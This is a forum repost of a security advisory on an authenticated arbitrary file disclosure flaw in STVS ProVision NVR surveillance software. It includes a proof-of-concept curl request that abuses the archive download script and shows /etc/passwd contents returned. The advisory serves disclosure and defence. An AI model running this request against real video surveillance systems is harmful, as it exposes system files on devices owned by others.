- Ја почнал/а темата
- #1
zeroscience
ZSL Bot v4.89.1.00
Код:
STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability
Vendor: STVS SA
Product web page: http://www.stvs.ch
Platform: Ruby
Affected version: 5.9.10 (build 2885-3a8219a)
5.9.9 (build 2882-7c3b787)
5.9.7 (build 2871-a450938)
5.9.1 (build 2771-1bbed11)
5.9.0 (build 2701-6123026)
5.8.6 (build 2557-84726f7)
5.7
5.6
5.5
Summary: STVS is a Swiss company specializing in development of
software for digital video recording for surveillance cameras
as well as the establishment of powerful and user-friendly IP
video surveillance networks.
Desc: The NVR software ProVision suffers from an authenticated
arbitrary file disclosure vulnerability. Input passed through
the files parameter in archive download script (archive.rb) is
not properly verified before being used to download files. This
can be exploited to disclose the contents of arbitrary and sensitive
files.
Tested on: Ubuntu 14.04.3
nginx/1.12.1
nginx/1.4.6
nginx/1.1.19
nginx/0.7.65
nginx/0.3.61
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5623
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php
19.01.2021
--
#2 LFI Prober (Verified):
-------------------------
$ curl "http://192.168.1.17/archive//download/unixpwdhere"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
Zero Science Lab » STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability
Македонска лабораторија за истражување и развој на информациска безбедност
www.zeroscience.mk